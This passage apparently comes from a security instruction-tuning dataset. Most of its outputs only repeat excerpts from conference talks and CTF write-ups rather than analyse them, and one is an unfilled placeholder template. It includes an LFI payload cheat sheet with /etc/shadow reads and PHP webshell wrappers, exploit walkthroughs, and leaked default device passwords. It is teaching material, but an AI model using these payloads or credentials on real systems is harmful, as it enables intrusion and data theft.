CHAPTER 02 Project ARSAP is Born CHAPTER 04 Ransomware and the Weaponization of Weaknesses CHAPTER 01 Brief Introduction to SAP CHAPTER 03 A Traditional Approach to Malware Distribution INTRODUCTION CHAPTER 01 A Brief Introduction to SAP WHAT IS SAP?  SAP stands for Systems Applications and Products in Data Processing. It is a German company founded in 1972 by ex-IBM employees.  SAP counts 88,500+ Employees Worldwide  SAP Has 378,000+ Customers  Is Present in More Than 180 Countries  Dominate the Market With 87% of Forbes Global 2000  SAP ERP (Enterprise Resource Planning)  SAP BI (Business Intelligence)  SAP CRM (Customer Relationship Management)  SAP SRM (Supplier Relationship Management) TWO TYPES OF SAP SOLUTIONS ENTERPRISE SOLUTIONS SUPPORTING SOLUTIONS  SAP GRC (Government Risk and Compliance)  SAP Business O", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nquotaon === 激活Linux内核中指定文件系统的磁盘配额功能 ## 补充说明 **quotaon命令** 执行quotaon指令可开启磁盘对用户和群组的空间使用限制但在开启前各分区的文件系统根目录必须存在通过quotacheck命令创建的quota配置文件 ### 语法 ```shell quotaon(选项)(参数) ``` ### 选项 ```shell -a开启在/ect/fstab文件里有加入quota设置的分区的空间限制 -g开启群组的磁盘空间限制 -u开启用户的磁盘空间限制 -v显示指令指令执行过程 ``` ### 参数 文件系统指定要激活磁盘配额功能的文件系统", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEvil Printer How to Hack Windows Machines with Printing Protocol Who are We?  Zhipeng Huo (@R3dF09)  Senior security researcher  Member of EcoSec Team at Tencent Security Xuanwu Lab  Windows and macOS platform security  Speaker of Black Hat Europe 2018 Who are We?  Chuanda Ding (@FlowerCode_)  Senior security researcher  Leads EcoSec Team at Tencent Security Xuanwu Lab  Windows platform security  Speaker of Black Hat Europe 2018, DEF CON China 2018, CanSecWest 2017/2016 Agenda  Printing internals  Attack surfaces  CVE-2020-1300  Exploitation walk-through  Patch  Conclusion Evil Printer? https://twitter.com/R3dF09/status/1271485928989528064 How does Network Printing Works Hey, server, print this document Client Server Printer Hey, printer, print this Done! Rendering in Network Printing Application Data Printer Driver Printer Data Client-side Rendering Client Send Printer Data Application Data Printer Driver Printer Data Server Server Client Send Application Data Server-side Rendering What is Printer Driver?  Rendering component  Convert application data into printer specified data  Configuration component  Enable user to configure printer Interface component between OS and Printer In order to support both client-side and server-side rendering, It is a requirement that printer drivers are available to print server and print client. Supporting Client-Side Rendering and Server-Side Rendering https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms- prsod/e47fedcc-d422-42a6-89fc-f04eb0c168e3 How is Printer Drivers Distributed?  Allows a print client to download printer driver directly from a print server Point-And-Print  Allows a print client to download a printer support package that includes the print driver Package Point-And-Print The package approach to driver installation provides improved security for point and print by checking driver signing during the establishment of a point and print connection. Point and Print with Packages https://docs.microsoft.com/e", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPicking Electronic Locks Using TCP Sequence Prediction Ricky Lawshae 2009 3/25/2009 1  OSCP, GPEN  Network Technician for Texas State University  Have been working with electronic building access systems for more years than I like to think about Who am I? 3/25/2009 2  Testing of security of building access systems always focused on ID cards and other authentication mediums  RFID  Magstripe  Biometrics  More prevalent usage of networked building access systems means more focus needs to be put on the controllers themselves  Lack of encryption  Persistent TCP sessions  Predictable sequence numbering Abstract 3/25/2009 3 Is it possible for attackers to spoof commands to these access systems without needing an authentication medium at all? The Question 3/25/2009 4  Authentication devices and locking devices both connected to control system (door controller)  Door controllers connected via TCP/IP to central database  Client programs used to make changes to database which are propagated down to door controllers  Status of locks/alarm points monitored remotely  Commands to lock and unlock(!!) doors can be sent across the network Brief Overview of Electronic Building Access 3/25/2009 5 Picking the Lock client database door controller doors 3/25/2009 6 Picking the Lock client database door controller doors attacker 3/25/2009 7  All comes down to TCP sequence prediction  Usually used to hijack TCP sessions  Guess the next sequence number, inject a packet into an existing session  Has been fixed in most modern operating systems and applications  Embedded systems are still notoriously bad Why It Works 3/25/2009 8 TCP Sequence Prediction Illustrated Sender Receiver SEQ 0 SEQ 30 SEQ 60 SEQ 90 3/25/2009 9 TCP Sequence Prediction Illustrated Sender Receiver SEQ 0 SEQ 30 SEQ 60 SEQ 60 Attacker WTF?? 3/25/2009 10 Proof of Concept? 3/25/2009 11  Breaking authentication medium not necessary to bypass networked electronic building access system  Any networked device must protect itself a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# I am many (for, 100p, 65 solved) A rather trivial forensics/stegano challenge. We get a png file: ![](hackover_first.png) But if we run binwalk on this, we can see that there is another PNG file glued at the end: ![](hackover_second.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking UFOlogy: Thirty Years in the Hall of Mirrors notes for a presentation by Richard Thieme Def Con 15  August 2007 These are notes  meant to be supportive of the one hour presentation made at Def Con 15 and suggestive of further avenues of inquiry. Consult the select bibliography at the end for further reading. Questions? write to rthieme@thiemeworks.com or neuralcowboy@gmail.com \"And those who were seen dancing were thought to be insane by those who could not hear the music.\" - Frederick Nietzsche Men will love you if you make them think that they think but will hate you if you make them think. I recommend we use scientific curiosity to see what is the physics of the phenomena so many people are describing as UFOs. Ascribing the phenomena to psychological aberrations is nonsense. There is a physical phenomena that needs explaining. Lets get on with it in an open-minded scientifically oriented manner. Then let the data provide the answer.  written almost 50 years ago by Dr. Horace C. Dudley, New Principles of Quantum Mechanics, 1959 - Fifty years later, I could make the same statement. So did Peter Sturrock, a physicist at Stanford. So did Michael Swords after decades of historical study, a professor of history at Western Michigan University. UFOlogy is a blend of facts  suppositions  intentional deceptions and disinformation  cover stories for black budget projects in the sciences and social sciences  outright boldfaced lies by charlatans, scam artists, and flimflam woman and men milking a gullible cow  a subset of religious experience and religious structures in 20th century America - and imaginary narratives promulgated through magazines, books, television, movies, web sites, etc. which become conflated memories blended with all of the above in the mind of society. Hence, the need for a few benchmarks in order to discuss all this for one hour in a sane way. First, we have to believe it is worthwhile. Hynek was asked, is there any evidence for UFOs? He replie", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSetiri: Advances in Trojan Technology Roelof Temmingh & Haroon Meer Defcon 10 Las Vegas 2002 Schedule Introduction Why Trojans? Brief History of Trojans & Covert Channels The Hybrid model Setiri: Advances in Trojan Technology Demonstration Taking it further Possible fixes Introduction SensePost The speakers Objective of the presentation Why Trojans? Profile of Trojan users Real criminals dont write buffer overflows The weirdness of the industry Examples Brief History of Trojans & Covert Tunnels Trojans From Quick Thinking Greeks  to Quick Thinking Geeks Tunnels Covert Channels Trojans (Valid IP  No Filters) get real.. Trojans (Valid IP  Stateless Filter) Dial Home Trojans Random Ports / Open Ports / High Ports [cDc] ACK Tunneling [Arne Vidstrom] Trojans (Stateful Filters) Orifice - http://bo2k.sourceforge.net Gbot Rattler Brief History of Trojans & Covert Tunnels Trojans From Quick Thinking Greeks  to Quick Thinking Geeks Tunnels Covert Channels Tunnels & Covert Channels 1985  TSC DefinitionCovert Channels 1996  Phrack Magazine  LOKI 1998  RWWWShell  THC 1999 - HTTPTUNNEL  GNU 2000 - FireThru - Firethru Conventional Trojans & how they fail Stateful firewall & IDS Direct model Direct model with network tricks ICMP tunneling ACK tunneling Properly configured stateful firewall IRC agents + Authentication proxy HTTP tunnel ++ Personal firewall & Advanced Proxy HTTP tunnel with Authentication +++ Hybrid model: GatSlag Combination between covert Tunnel and Trojan Defenses mechanisms today: Packet filters (stateful) / NAT Authentication Proxies Intrusion detection systems Personal firewalls Content/protocol checking Biometrics/Token Pads/One time passwords Encryption A typical network How GatSlag worked Reverse connection HTTP covert tunnel Microsoft Internet Explorer as transport Controls IE via OLE Encapsulate in IE, not HTTP Receive commands in title of web page Receive encoded data as plain text in body of web page Send data with POST request Send alive signals with GE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n漏洞描述 常逛zdi发现的洞Orckestra C1 CMS 6.10存在 .net 反序列化漏洞需要登录成因是因 为 TypeNameHandling.Auto 环境搭建 下载 https://github.com/Orckestra/C1-CMS-Foundation/releases/download/v6.10/C1.CMS.6.10.zip 然后Visual Studio打开运 分析 根据cve描述和补丁对发现漏洞点存在于Composite.dll使github的对发现在此commit中增加了对反序列 化绑定类型的校验 https://github.com/Orckestra/C1-CMS-Foundation/commit/73dc26050e5f3ffc31531aa332463de9398bc213 我在之前的章中写过json.net如果使了TypeNameHandling.All或者TypeNameHandling.Auto会造成反 序列化问题官建议如果使TypeNameHandling要使binder来控制反序列化的类型 那么根据补丁我们来看6.10版本的CompositeSerializationBinder类 有漏洞的6.10版本中判断了assemblyName等于 Composite.Generated 并且typeName以CompositeGenerated 开头进写类的type逻辑处理别的type直接调基类那么等于没做限制 CompositeSerializationBinder被在CompositeJsonSerializer类中其中有两个静态法需要注意 直接传json字符串然后反序列化并且TypeNameHandling为auto 第个静态法较关键 分别获取json中的meta:objmeta:type然后根据type反射获取其Deserialize法如果为空则调上的第 个静态法传meta:obj标签的值直接反序列化 我们可以构造payload如下 当type获取不到静态Deserialize法时进 CompositeJsonSerializer.Deserialize<T>(text) 那么这两个点都可控接着我们看哪调了这个法 {\"meta:obj\":\"\",\"meta:type\":\"\"} EntityTokenSerializer.Deserialize(string)调其两个参数的重载法经过 CompositeJsonSerializer.IsJsonSerialized(serializedEntityToken)判断进  CompositeJsonSerializer.Deserialize<EntityToken>(serializedEntityToken, includeHashValue) 这接受的类型为EntityToken所以我们需要寻找EntityToken中可以存储payload的地例如个object类型 的字段 我们可以通过代码来寻找哪些类继承了EntityToken类 Assembly[] assemblies = AppDomain.CurrentDomain.GetAssemblies(); foreach (var assembly in assemblies) { if (assembly.FullName.Contains(\"Composite\")) { Type[] types = assembly.GetTypes(); foreach (var type in types) { try { if (!typeof(EntityToken).IsAssignableFrom(method.ReturnType)) { continue; } else { var memberInfos = type.GetProperties(BindingFlags.NonPublic|BindingFlags.Instance|BindingFlags.Public); foreach (var member in memberInfos) { resp($\"type:{type.Name} 字段名:{member.Name} 类型: {member.PropertyType}\"); } } } catch { } } } } 发现DataGroupingProviderHelperEntityToken类中GroupingValues是个 Dictionary<string, object> 类 型可以存放gadget 那么可以构造payload using Composite.C1Console.Elements.ElementProviderHelpers", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEsoteric Exfiltration Willa Riggins Who Am I? Seriously, people. Does someone know? Cause I don t.  Senior Penetration Tester @ Veracode  FamiLAB Member  DC407 Point of Contact  OWASP Orlando Marketing Coordinator  BSides Orlando Social Media Lady  @willasaywhat on Twitter Exfiltration 101 What Is It? Data exfiltration is the unauthorized transfer of sensitive information from a targets network to a location which a threat actor controls., Trend Micro Why Should You Care?  Data loss costs time, money, and your sanity.  Ever found a credential dump on pastebin?  Come on, are we still reading the slides?  If you didnt care you wouldnt be here. 82% Of those surveyed in 2012 from /r/netsec said that preventing exfiltration was important to the security of their information systems Esoteric Exfiltration  Mask traffic with normal usage patterns  Social media  Web traffic  Protocols used for day to day business  Hide data in known safe payloads  Status updates  HTTP POST Payloads  Stay quiet, within normal payload sizes  Throttle exfil chunks  Set payload sizes based on the channel used  Encode and/or encrypt chunks Covert Channels & Where to Find Them Transport: Change the Channel  Network  3rd Party  Airwaves Network: Data on the Wire  The Obvious  HTTP  SSH  Netcat  The Discreet  Using normal protocols in abnormal ways 3rd Party: Hide Yo Data  The Obvious  Dropbox  Pastebin  The Discreet  Flickr  Twitter Airwaves: Breaking Layer One  The Obvious  Wifi Adapter on a Raspberry Pi  The Discreet  Xbee 900mhz Long Range Mesh Network Weaponizing Squirrels Squirrel: Exfiltration for Nuts  Python 2.7 based application  Open Source; MIT License  Extensible via simple module based plugins  Upload and execute with CLI arguments Module Overview <REDACTED> Squirrels steal nuts, get it? Squirrel Demo Closing Remarks Future Work  Additional Squirrel Modules:  <REDACTED>  Metasploit Post Module  Longer range, more nodes, less physical space using Teensy. Shoutouts", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 栈介绍 ## 基本栈介绍 栈是一种典型的后进先出( Last in First Out )的数据结构其操作主要有压栈(push)与出栈(pop)两种操作如下图所示维基百科两种操作都操作栈顶当然它也有栈底 高级语言在运行时都会被转换为汇编程序在汇编程序运行过程中充分利用了这一数据结构每个程序在运行时都有虚拟地址空间其中某一部分就是该程序对应的栈用于保存函数调用信息和局部变量此外常见的操作也是压栈与出栈需要注意的是**程序的栈是从进程地址空间的高地址向低地址增长的** ## 函数调用栈 请务必仔细看一下下面的文章来学习一下基本的函数调用栈 - [C语言函数调用栈(一)](http://www.cnblogs.com/clover-toeic/p/3755401.html) - [C语言函数调用栈(二)](http://www.cnblogs.com/clover-toeic/p/3756668.html) 这里再给出另外一张寄存器的图 需要注意的是32 位和 64 位程序有以下简单的区别 - **x86** - **函数参数**在**函数返回地址**的上方 - **x64** - System V AMD64 ABI (LinuxFreeBSDmacOS 等采用)中前六个整型或指针参数依次保存在**RDI, RSI, RDX, RCX, R8 和 R9 寄存器**中如果还有更多的参数的话才会保存在栈上 - 内存地址不能大于 0x00007FFFFFFFFFFF**6 个字节长度**否则会抛出异常 ## 参考阅读 - csapp - Calling conventions for different C++ compilers and operating systems, Agner Fog", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSearching for the Light: Adventures w/ OpticSpy Joe Grand (@joegrand) Hacker, Engineer, Daddy OpticSpy ! Optical receiver to convert light into voltage ! Wavelength: Visible and near IR light (420-940nm) ! Signal speed: 100Hz-1.5MHz ! Data stream polarity: Select normal v. inverted ! Gain and threshold adjustment via potentiometers ! USB interface for direct connection to host PC Covert Channels ! Hidden methods to intentionally exfiltrate/transfer data from a normally functioning system ! Could be achieved with HW and/or FW modification ! Specifications modified or misdesigned before manufacturing ! On physical device during manufacturing or in- the-field ! Hardware implant via interdiction Exploiting the Environment ! Leakage based on optical, acoustic, thermal, or RF characteristics of a system ! Soft Tempest: Hidden Data Transmission Using Electromagnetic Emanations (Kuhn, Anderson) ! Emanate Like a Boss: Generalized Covert Data Exfiltration with Funtenna (Cui) ! Inaudible Sound as a Covert Channel in Mobile Devices (Deshotels) ! BitWhisper: Covert Signaling Channel between Air-Gapped Computers using Thermal Manipulations (Guri et al.) Blinkenlights ! Using LEDs to exfiltrate/send data ! Modulation faster than the human eye can detect ! Optical covert channels ! Information Leakage from Optical Emanations (Loughry and Umphress, 2002) ! Silence on the Wire: A Field Guide to Passive Reconnaissance and Indirect Attacks (Zalewski) ! Extended Functionality Attacks on IoT Devices: The Case of Smart Lights (Ronen, Shamir) ! xLED: Covert Data Exfiltration from Air-Gapped Networks via Router LEDs (Guri et al.) A Selection of Optical History ! Alexander Graham Bell's Photophone (1880) ! Fiber optic communications (~1963) ! Laser tag (~1979) ! Optical networking systems (VLC, Li-Fi, FSO) (2011) Related Projects ! Heathkit Laser Trainer/Receiver (1985) ! Engineers Mini Notebook: Optoelectronics Circuits (Forest Mims III, 1985) ! IRis (Craig Heffner, 2016) ! See no evil, hea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Local File Inclusion (LFI) ## Introduction Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server ## Where to find - Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html` ## How to exploit 1. Basic payload ``` http://example.com/index.php?page=../../../etc/passwd http://example.com/index.php?page=../../../../../../../../../../../../etc/shadow ``` 2. URL encoding ``` http://example.com/index.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd ``` 3. Double encoding ``` http://example.com/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd ``` 4. UTF-8 encoding ``` http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd ``` 5. Using Null Byte (%00) ``` http://example.com/index.php?page=../../../etc/passwd%00 ``` 6. From an existent folder ``` http://example.com/index.php?page=scripts/../../../../../etc/passwd ``` 7. Path truncation ``` http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././. http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd ``` 8. Using PHP Wrappers: filter ``` http://example.com/index.php?page=php://filter/read=string.rot13/resource=config.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=config.php ``` 9. Using PHP Wrappers: zlib ``` http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/shadow ``` 10. Using PHP Wrappers: zip ``` echo \"<pre><?php system($_GET['cmd']); ?></pre>\" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php http://example.com/index.php?page=zip://shell.jpg%23payload.php ``` 11. Using PHP Wrappers: data ``` http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+ ``` 12. Using PHP Wrappers: expect ``` http://example.com/index.php?page=expect://ls ``` 13. Using PHP Wrappers:", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLogic Trunked Systems http://www.signalharbor.com/ttt/00may/index.html 1 of 5 6/18/2007 14:08 This article first appeared in the May 2000 issue of Monitoring Times. LOGIC TRUNKED SYSTEMS This month we continue our tour of different trunked radio systems with a look at Logic Trunked Radio (LTR). This protocol was developed in 1978 by the E.F. Johnson company and is still in use, primarily by private companies such as taxicabs, utilities, delivery trucks, and repair services. It is not very popular with public safety agencies, who typically operate either Motorola or EDACS trunked radio systems. LTR operates differently than Motorola and EDACS in several ways. Decentralized operation All mobile radios in a centralized trunking system must request service through a single control channel. Access requests are usually handled in sequential order, and this bottleneck may delay messages during periods of heavy use. More importantly, a dedicated control channel also removes one radio frequency from use as a voice channel. A five-channel Motorola system, for instance, would have one control channel and four voice channels. LTR systems use a distributed method of access where service may be requested on any channel, and every channel may be used for voice communications. In a five-channel LTR system, all five channels can be used for voice traffic, making more efficient use of the assigned radio frequencies. Also, since each repeater operates more or less independently, if equipment associated with one repeater fails, all the others continue to operate normally. LTR systems can have up 20 repeaters, one repeater per channel, all of which must be located at a single site. The repeaters are physically interconnected by a data bus and share status information with each other. Each repeater can then transmit information about which channels are idle and which are busy, and which talkgroup is active on which channel. LTR uses digital control signaling combined with analog voice tr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSwitches Get Stitches: Episode 3 Then there were three of them. Who are we? Last episode on switches get stitches Scalance X-Family < V5.0.0 echo -n \"admin:password:C0A800020002F72C\" | md5sum C0A8006500000960 C0A8006500001A21 C0A80065000049A6 C0A8006500005F31 C0A800650007323F This is the hash on the wire. Mmmm, low sodium cracking. Last episode on switches get stitches Scalance X-Family < V5.0.0 echo -n \"admin:password:C0A800020002F72C\" | md5sum C0A80065 uptime in hex -> 00000960 C0A80065 00001A21 C0A80065 000049A6 C0A80065 00005F31 C0A80065 <- client ip in hex 0007323F Siemens Session IDs are drunk. Siemens Scalance XNNN CSRF of: firmware || logs || config https://github.com/blackswanburst/scalance GE XSS GE Private Keys. Oh My. GE Firmware integrity GE DDoS Garretcom Keys. Oh My. OpenGear are cool.  I reported an oldae to them: CVE-2006-5229  They fixed it in ONE WEEK. One.  Thank OpenGear for fixing vulns in NORMAL security patch time instead of MONTHS. This is a personal record, getting anything patched in ONE week in SCADA is unheard of.  Also most secure default deployment Ive seen, but Colin has some vulns later. EOL and forever days.  Security economics  Code Escrow  Long term thinking  Over to Robert for the defence leetness.  Bring me my stage manhattan, Im done. Siemens Scalance X200 Continuing a theme  Binwalk-ing the 5.0.1 firmware we get: Siemens Scalance X200 Continuing a theme Siemens Scalance X200 Continuing a theme Siemens Scalance X200 Continuing a theme Siemens Scalance X200 Continuing a theme  Self signed default Certificate  Can be changed via Web interface  Not mentioned anywhere in the documentation GE MDS Wiyz GE MDS Wiyz GE MDS Wiyz GE MDS Wiyz  Passwd file contained undocumented users and hashes  admin  admin  guest  guest  authcode  authode  fact  wal63sfo  root - ?? GE MDS Wiyz Key Management in network equipment  Default Keys are to be expected, however  Undocumented Certs/Keys = bad  Unchangeable Cert/keys = bad  Self-signed keys = ?? ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 在内存中直接搜索 flag **Initial RAM disk**`initrd`提供了在 boot loader 阶段载入一个 RAM disk 并挂载为根文件系统的能力从而在该阶段运行一些用户态程序在完成该阶段工作之后才是挂载真正的根文件系统 initrd 文件系统镜像通常为 gzip 格式在启动阶段由 boot loader 将其路径传给 kernel自 2.6 版本后出现了使用 cpio 格式的initramfs从而无需挂载便能展开为一个文件系统 initrd/initramfs 的特点便是**文件系统中的所有内容都会被读取到内存当中**而大部分 CTF 中的 kernel pwn 题目都选择直接将 initrd 作为根文件系统因此若是我们有着内存搜索能力我们便能**直接在内存空间中搜索 flag 的内容**  ## 例题RWCTF2023体验赛 - Digging into kernel 3 ### 题目分析 题目已经在前面分析过了这里笔者就不重复分析了  ### 漏洞利用ldt\\_struct 直接读取 initramfs 内容 既然题目中已经直接白给出了一个无限制的 UAF那么利用方式就是多种多样的了 :-D 这里笔者选择利用 [ldt_struct](https://arttnba3.cn/2021/11/29/PWN-0X02-LINUX-KERNEL-PWN-PART-II/#0x03-ldt-struct-%E4%B8%8E-modify-ldt-%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8) 直接在内存空间中搜索 flag 的方式解题 #### Step.I - 利用 ldt\\_struct 进行任意内存读取 ldt 即**局部段描述符表****Local Descriptor Table**其中存放着**进程的**段描述符段寄存器当中存放着的段选择子便是段描述符表中段描述符的索引在内核中与 ldt 相关联的结构体为 `ldt_struct` 该结构体定义如下 `entries` 指针指向一块描述符表的内存`nr_entries` 表示 LDT 中的描述符数量 ```c struct ldt_struct { /* * Xen requires page-aligned LDTs with special permissions. This is * needed to prevent us from installing evil descriptors such as * call gates. On native, we could merge the ldt_struct and LDT * allocations, but it's not worth trying to optimize. */ struct desc_struct *entries; unsigned int nr_entries; /* * If PTI is in use, then the entries array is not mapped while we're * in user mode. The whole array will be aliased at the addressed * given by ldt_slot_va(slot). We use two slots so that we can allocate * and map, and enable a new LDT without invalidating the mapping * of an older, still-in-use LDT. * * slot will be -1 if this LDT doesn't have an alias mapping. */ int slot; }; ``` 我们主要关注该结构体如何用作漏洞利用Linux 提供了一个 `modify_ldt()` 系统调用操纵当前进程的 `ldt_struct` 结构体 ```c SYSCALL_DEFINE3(modify_ldt, int , func , void __user * , ptr , unsigned long , bytecount) { int ret = -ENOSYS; switch (func) { case 0: ret = read_ldt(ptr, bytecount); break; case 1: ret = write_ldt(ptr, bytecount, 1); break; case 2: ret = read_default_ldt(ptr, bytecount); b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Pyhon --- **推荐工具/资源** - [pycharm](https://www.jetbrains.com/pycharm/) - [vscode](https://code.visualstudio.com/) - [jackzhenguo/python-small-examples](https://github.com/jackzhenguo/python-small-examples) --- ## 安装/配置/报错 ### 安装 **yum 安装** ```bash yum install epel-release 或 wget -O /etc/yum.repos.d/epel.repo http://mirrors.aliyun.com/repo/epel-7.repo yum -y install python36 python36-devel wget https://bootstrap.pypa.io/get-pip.py ## 安装pip3 python3 get-pip.py ``` **源代码编译方式安装** 安装依赖环境 ```bash yum -y install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel gdbm-devel db4-devel libpcap-devel xz-devel ``` 下载Python3 `wget https://www.python.org/ftp/python/3.6.1/Python-3.6.1.tgz` 安装python3 ```bash mkdir -p /usr/local/python3 tar zxvf Python-3.6.1.tgz cd Python-3.6.1 ./configure --prefix=/usr/local/python3 make make install 或者 make && make install ``` 添加到环境变量 ```bash ln -s /usr/local/python3/bin/python3 /usr/bin/python3 ``` ```vim vim ~/.bash_profile ## 永久修改变量 PATH=$PATH:/usr/local/python3/bin/ ``` `source ~/.bash_profile ` 检查 Python3 及 pip3 是否正常可用 ```bash python3 -V pip3 -V ``` --- ### 打包 **Pyinstaller** 安装 Pyinstaller ```bash pip3 install PyInstaller ``` 使用 Pyinstaller ```bash python3 PyInstaller.py -F test.py 或 python -m PyInstaller -F test.py ## -F 表示生成单个可执行文件 ## -w 表示去掉控制台窗口,这在GUI界面时非常有用.不过如果是命令行程序的话那就把这个选项删除吧 ## -p 表示你自己自定义需要加载的类路径,一般情况下用不到 ## -i 表示可执行文件的图标 ``` 文件中使用了第三方库的打包方式 在打包之前务必找到第三方库的包,把包复制到到跟 test.py 同目录下,然后再使用以上2种方式打包,否则会打包失败或者即使打包成功,程序也会闪退. exe文件生成 如果程序打包过程没有报错,则会生成3个文件夹(有时候是2个),其中名为 dist 的文件夹中会有一个 test.exe 文件,运行一下,如果没有问题就打包成功,可以把这个 exe 文件单独拿出去用,其他的生成的文件夹可以删掉了. **py2exe** py2exe 就是将 python 代码打包成 windows 可执行程序的一个 python 开源项目 安装 ``` python -m pip install py2exe ``` 基础方式 setup.py ```py from distutils.core import setup import py2exe import sys sys.argv.append('py2exe') setup(console=[\"yourcode.py\"]) ``` ``` python setup.py ``` 进阶方法 ```py from distutils.core import setup import py2exe import sys ## 允许程序通过双击的形式执行 sys.argv.ap", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请解释CSRF攻击的原理和防护方法", "input": "", "output": "CSRF攻击是一种常见的网络安全威胁。攻击原理：[具体原理说明]。防护措施：1. [防护方法1] 2. [防护方法2] 3. [防护方法3]", "category": "security_knowledge", "source": "manual"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 创建命令 --- - https://www.kancloud.cn/imxieke/ruby-base/107289 --- 来实际体验一下如何用 Ruby 实现 Unix 的 grep 命令以便大家了解用 Ruby 编写程序的大概流程 # 命令行的输入数据 到目前为止我们写的程序都是向屏幕输出数据现在我们考虑一下怎么输入数据在创建命令前我们首先得知道怎么使用命令那么让我们先来看看怎么把数据传递给程序 向程序传递数据最简单的方法就是使用命令行Ruby 程序中使用 `ARGV` 这个 Ruby 预定义好的数组来获取从命令行传递过来的数据数组 `ARGV` 中的元素就是在命令行中指定的脚本 字符串参数 在命令行指定多个脚本参数时各参数之间用空格间隔 ```ruby puts \"首个参数: #{ARGV[0]}\" puts \"第2 个参数: #{ARGV[1]}\" puts \"第3 个参数: #{ARGV[2]}\" ``` ```ruby > ruby print_argv.rb 1st 2nd 3rd 首个参数: 1st 第 2 个参数: 2nd 第 3 个参数: 3rd ``` 使用数组 ARGV 后程序需要用到的数据就不必都写在代码中同时抽取数据保存数据等普通的数组操作对于 ARGV 都是适用的 ```ruby name = ARGV[0] print \"Happy Birthday, \", name, \"!\\n\" ``` 执行示例 ``` > ruby happy_birth.rb Ruby Happy Birthday, Ruby! ``` 从参数里得到的数据都是字符串因此如果希望进行运算时需要对获得的数据进行类型转换把字符串转换为整数我们可以使用 `to_i` 方法 ```ruby num0 = ARGV[0].to_i num1 = ARGV[1].to_i puts \"#{num0} + #{num1} = #{num0 + num1}\" puts \"#{num0} - #{num1} = #{num0 - num1}\" puts \"#{num0} * #{num1} = #{num0 * num1}\" puts \"#{num0} / #{num1} = #{num0 / num1}\" ``` 执行示例 ``` > ruby arg_arith.rb 5 3 5 + 3 = 8 5 - 3 = 2 5 * 3 = 15 5 / 3 = 1 ``` # 文件的读取 Ruby 脚本除了读取命令行传递过来的字符串参数外还可以读取预先写在文件里的数据 Ruby 的源代码中有一个名为 ChangeLog 的文本文件文件里面记录了 Ruby 相关的修改日志 文件内容如下所示 ```  Mon Feb 27 23:46:09 2012 Yukihiro Matsumoto <matz@ruby-lang.org> * parse.y (opt_bv_decl): allow newline at the end. [ruby-dev:45292]  ``` **从文件中读取内容并输出** 首先我们先做一个简单文件内容读取程序读取文件内容的流程如下所示 1. 打开文件 2. 读取文件的文本数据 3. 输出文件的文本数据 4. 关闭文件 ```ruby filename = ARGV[0] file = File.open(filename) # ① text = file.read # ② print text # ③ file.close # ④ ``` 与之前的例子相比这个例子的代码终于有点程序的模样了接下来我们逐行分析 第 1 行将命令行参数 `ARGV[0]` 赋值给变量 filename也就是说filename 表示我们希望读取的文件名 第 2 行`File.open(filename)` 表示打开名为 filename 的文件并返回读取该文件所需的对象可能会有读者不太明白什么是读取该文件所需的对象不过不要紧目前我们暂时只需要知道有这么一个对象就可以了 读取该文件所需的对象实际在第 3 行使用在这里read 方法读取文本数据并将读取到的数据赋值给 text 变量接下来第 4 行的代码会输出 text 的文本数据到目前为止我们使用过好多次 print 方法了大家应该不会陌生了吧然后程序执行最后一段代码的 close 方法这样就可以关闭之前打开了的文件了 像下面那样执行这个程序后指定的文件内容会一下子全部输出到屏幕中 ``` ruby read_text.rb 文件名 ``` 其实如果只是读取文件内容直接使用 read 方法会使程序更简单 ```ruby filename = ARGV[0] text = File.re", "category": "text_analysis", "source": "security_papers"}
